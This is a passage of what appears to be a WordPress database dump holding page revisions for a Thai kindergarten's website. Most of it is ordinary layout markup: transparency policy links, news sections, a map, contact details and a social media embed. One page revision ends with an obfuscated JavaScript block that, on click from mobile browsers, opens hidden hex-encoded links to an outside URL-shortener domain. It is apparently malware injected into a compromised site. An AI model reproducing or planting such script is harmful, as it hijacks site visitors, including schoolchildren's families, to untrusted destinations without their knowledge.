Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:53:01','2024-07-27 14:53:01','',19,'http://watprato.ssk.in.th/?p=83',0,'revision','',0),
(85,1,'2024-07-27 21:59:05','2024-07-27 14:59:05','','awpt','','inherit','open','closed','','awpt','','','2024-07-27 21:59:05','2024-07-27 14:59:05','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif',0,'attachment','image/gif',0),
(86,1,'2024-07-27 21:59:10','2024-07-27 14:59:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https: